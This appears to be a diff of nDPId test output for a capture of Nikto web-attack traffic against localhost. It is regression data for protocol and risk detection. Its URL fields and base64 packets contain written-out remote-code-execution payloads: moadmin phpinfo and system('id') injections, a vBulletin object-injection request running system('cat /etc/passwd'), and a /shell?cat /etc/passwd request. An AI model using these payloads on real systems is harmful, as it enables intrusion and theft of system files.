 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
-01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}}
+01384{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01251{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"}
-01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}}
+01391{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
